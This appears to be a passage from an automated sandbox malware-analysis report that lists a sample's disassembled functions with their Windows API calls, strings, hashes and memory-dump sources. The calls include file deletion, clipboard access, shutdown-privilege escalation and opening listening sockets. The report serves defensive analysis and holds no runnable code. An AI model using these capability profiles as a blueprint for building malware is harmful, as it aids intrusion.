                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                            • Opcode ID: b282003fb7df677f2129fa76752c744bc760c716016da8cd0c342602bdbb8172
                                                                                                            • Instruction ID: 0747742680077c0f02b0f2bae3e592fabf8f66596e5ce186fff369d8c1e45300
                                                                                                            • Opcode Fuzzy Hash: b282003fb7df677f2129fa76752c744bc760c716016da8cd0c342602bdbb8172
                                                                                                            • Instruction Fuzzy Hash: 92D14DB1508300AEC710EBA4D891EABB7ECEF98705F44491DF985D7191EB34DA48CB72
                                                                                                            Function 00DC9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DC9663
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00DC96A1
                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00DC96BB
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DC96D3
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC96DE
                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00DC96FA
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC974A
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00E16B7C), ref: 00DC9768
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC9772
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC977F
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC978F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1409584000-438819550
                                                                                                            • Opcode ID: 28a9026f704857826d730abd3177e0d1076cffaf104fc1efb58018622531facb
                                                                                                            • Instruction ID: 0939afaef0f84a16d6cf1f21f814639c22c42a713a34f66fe0592cfefd14101d
                                                                                                            • Opcode Fuzzy Hash: 28a9026f704857826d730abd3177e0d1076cffaf104fc1efb58018622531facb
                                                                                                            • Instruction Fuzzy Hash: 9131CD3254134A6ACB10AFB4EC5DFDEB7ACAF09320F144159E914E71E0EB70DA858A38
                                                                                                            Function 00DC979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DC97BE
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DC9819
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC9824
                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00DC9840
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC9890
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00E16B7C), ref: 00DC98AE
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC98B8
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC98C5
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC98D5
                                                                                                              • Part of subcall function 00DBDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DBDB00
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 2640511053-438819550
                                                                                                            • Opcode ID: 233f8653ac4bc7546d6be1c9f2bf654fbae527d93dc503254d20319c8bbfbecc
                                                                                                            • Instruction ID: 55e4d0a7ae2fc967366845874927f1af1e788a5cb9ef5df85e208ddf0e831854
                                                                                                            • Opcode Fuzzy Hash: 233f8653ac4bc7546d6be1c9f2bf654fbae527d93dc503254d20319c8bbfbecc
                                                                                                            • Instruction Fuzzy Hash: AF31C03250035A6ADF10AFA4EC59FDEB7ACAF06320F14415AE914E71D0DB71DA868A74
                                                                                                            Function 00DC8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00DC8257
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DC8267
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DC8273
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC8310
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8324
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8356
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC838C
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1464919966-438819550
                                                                                                            • Opcode ID: 70e8e514ce1a68b4a64ad5d41a3d330739dd8cd8eb7c7a21445c739f615d097c
                                                                                                            • Instruction ID: f6e352aa9cd902ab8393654aefb9bb368b60376a1bc53d8429979a5e29fa8d3b
                                                                                                            • Opcode Fuzzy Hash: 70e8e514ce1a68b4a64ad5d41a3d330739dd8cd8eb7c7a21445c739f615d097c
                                                                                                            • Instruction Fuzzy Hash: 5E6137725043459FCB10EF64C844E9EB3E8FF89315F04891EE999C7251EB31E949CBA2
                                                                                                            Function 00DBD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
                                                                                                              • Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00DBD122
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DBD1DD
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00DBD1F0
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DBD20D
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD237
                                                                                                              • Part of subcall function 00DBD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DBD21C,?,?), ref: 00DBD2B2
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00DBD253
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DBD264
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                            • Opcode ID: 752bd73b1d9262fa68b2e40e1718061770a0da0a184f043b2e558fd97430643e
                                                                                                            • Instruction ID: 36846d380d62bce26be0602ef661a3198d57e5a5ed34425316b6ec9865c3d69c
                                                                                                            • Opcode Fuzzy Hash: 752bd73b1d9262fa68b2e40e1718061770a0da0a184f043b2e558fd97430643e
                                                                                                            • Instruction Fuzzy Hash: 93615C3180125DEACF05EBA4C9929EDBBB6EF15341F644165E80277192EB30AF09CB70
                                                                                                            Function 00DCED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1737998785-0
                                                                                                            • Opcode ID: 7a5496f5f49c3dea2099ca5f980d5c0faae5bb73f016d8b33e7a258b95013df6
                                                                                                            • Instruction ID: 3833c21e22ff719643db212a085b17bf55233730cdb4f401cfbe22ee28e07afe
                                                                                                            • Opcode Fuzzy Hash: 7a5496f5f49c3dea2099ca5f980d5c0faae5bb73f016d8b33e7a258b95013df6
                                                                                                            • Instruction Fuzzy Hash: 8341AC71204252AFD720EF15D888F1ABBA5EF44358F18C09DE8168F762C735ED42CBA0
                                                                                                            Function 00DBE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
                                                                                                              • Part of subcall function 00DB16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
                                                                                                              • Part of subcall function 00DB16C3: GetLastError.KERNEL32 ref: 00DB174A
                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00DBE932
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                            • Opcode ID: 4f8a609394a60dac6c862d026fcf985c9d291dc3ed0932f0f76f156e34f05f17
                                                                                                            • Instruction ID: cc56c3be2a14b8c223c9e30e98ba2497402ded0b8523fc8ed03fe25a26a8e337
                                                                                                            • Opcode Fuzzy Hash: 4f8a609394a60dac6c862d026fcf985c9d291dc3ed0932f0f76f156e34f05f17
                                                                                                            • Instruction Fuzzy Hash: 9D018F72620311EBEF6827B49C86BFE739CA714750F190422F913E71D2D5A09C4889B4
                                                                                                            Function 00DD1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DD1276
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1283
                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00DD12BA
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD12C5
                                                                                                            • closesocket.WSOCK32(00000000), ref: 00DD12F4
                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 00DD1303
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD130D
                                                                                                            • closesocket.WSOCK32(00000000), ref: 00DD133C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 540024437-0
                                                                                                            • Opcode ID: 1212ebaf58eb9c63f62f1da95abc4c0c83d8c74fc37c3544213fb216dd7abaa6
                                                                                                            • Instruction ID: 02e9bd60b65a9530b08b04c6dde7d225181a2c9fb6d1e6bfcc951d15c92840dc
                                                                                                            • Opcode Fuzzy Hash: 1212ebaf58eb9c63f62f1da95abc4c0c83d8c74fc37c3544213fb216dd7abaa6
                                                                                                            • Instruction Fuzzy Hash: D1418E35600240AFD714EF64C5C9B29BBE5EF86318F188189E8568F392C771ED86CBB1
                                                                                                            Function 00DBD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
                                                                                                              • Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00DBD420
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DBD470
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD481
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DBD498
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DBD4A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                            • Opcode ID: 2dee8502bfac49e5d41f56b096346f697820f7f7e24d452e8c4184dc554338b3
                                                                                                            • Instruction ID: 1c7d84580ec7558fe9539aabc7a98717b09aaf9f0fe17d85d979847691116adf
                                                                                                            • Opcode Fuzzy Hash: 2dee8502bfac49e5d41f56b096346f697820f7f7e24d452e8c4184dc554338b3
                                                                                                            • Instruction Fuzzy Hash: 35316F310183859BC604EF64D8918EFB7E8EE91315F444A2DF8D293191EB30EA0D8B72
                                                                                                            Function 00D8E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __floor_pentium4
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                            • Opcode ID: 29e7824cfa44b1d465d13a82da6650ed19dc2de93f061ddfcb9cc93091b78330
                                                                                                            • Instruction ID: e4cdec681efa82414556bea950d8c56840669391569fa791a5fad8432e2456c4
                                                                                                            • Opcode Fuzzy Hash: 29e7824cfa44b1d465d13a82da6650ed19dc2de93f061ddfcb9cc93091b78330
                                                                                                            • Instruction Fuzzy Hash: 44C23C71E086288FDB25EF28DD407EAB7B5EB48305F1941EAD44DE7241E774AE818F60
                                                                                                            Function 00DC648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DC64DC
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DC6639
                                                                                                            • CoCreateInstance.OLE32(00DEFCF8,00000000,00000001,00DEFB68,?), ref: 00DC6650
                                                                                                            • CoUninitialize.OLE32 ref: 00DC68D4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 886957087-24824748
                                                                                                            • Opcode ID: b56ccb85117341ab80976c514f8e17b519f3cd45c66e14010b8224f945ee3e35
                                                                                                            • Instruction ID: bf00ad3c12745b05648b8755dc9d452eb72d4c31a19a8c342646de0762e25af0
                                                                                                            • Opcode Fuzzy Hash: b56ccb85117341ab80976c514f8e17b519f3cd45c66e14010b8224f945ee3e35
                                                                                                            • Instruction Fuzzy Hash: 5FD15771518301AFC704EF24C881E6BB7E9EF98305F14496DF9958B291EB30E909CBB2
                                                                                                            Function 00DD22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00DD22E8
                                                                                                              • Part of subcall function 00DCE4EC: GetWindowRect.USER32(?,?), ref: 00DCE504
                                                                                                            • GetDesktopWindow.USER32 ref: 00DD2312
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DD2319
                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DD2355
                                                                                                            • GetCursorPos.USER32(?), ref: 00DD2381
                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DD23DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                            • String ID:
                                                                                                            • API String ID: 2387181109-0
                                                                                                            • Opcode ID: c40d358fd3c1869a29c3c6657c2d56856c620f7f20992934b6ec81398b547139
                                                                                                            • Instruction ID: 44ac6c6e6456559298b898611378b1081153521bdb794aa96a080808e85cbbbd
                                                                                                            • Opcode Fuzzy Hash: c40d358fd3c1869a29c3c6657c2d56856c620f7f20992934b6ec81398b547139
                                                                                                            • Instruction Fuzzy Hash: D231CF72504355ABCB20DF14C845FABB7A9FF84310F00091EF995DB291DB34E909CBA2
                                                                                                            Function 00DC9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DC9B78
                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DC9C8B
                                                                                                              • Part of subcall function 00DC3874: GetInputState.USER32 ref: 00DC38CB
                                                                                                              • Part of subcall function 00DC3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DC3966
                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DC9BA8
                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DC9C75
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1972594611-438819550
                                                                                                            • Opcode ID: afcd0dec3f53b1614df52ef0ba18d3bdd6f1bc09f111a9d98e7f26cd65e4a7b0
                                                                                                            • Instruction ID: 169f150e56df6f9eabea7c39b5520671a8adbec04da6d1f8f9ba486e5b93dbcd
                                                                                                            • Opcode Fuzzy Hash: afcd0dec3f53b1614df52ef0ba18d3bdd6f1bc09f111a9d98e7f26cd65e4a7b0
                                                                                                            • Instruction Fuzzy Hash: F6416D7190420AAFCF14EFA4C999FEEBBB4EF05301F244159E805A7191EB319E85CB74
                                                                                                            Function 00D6997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D69A4E
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00D69B23
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00D69B36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
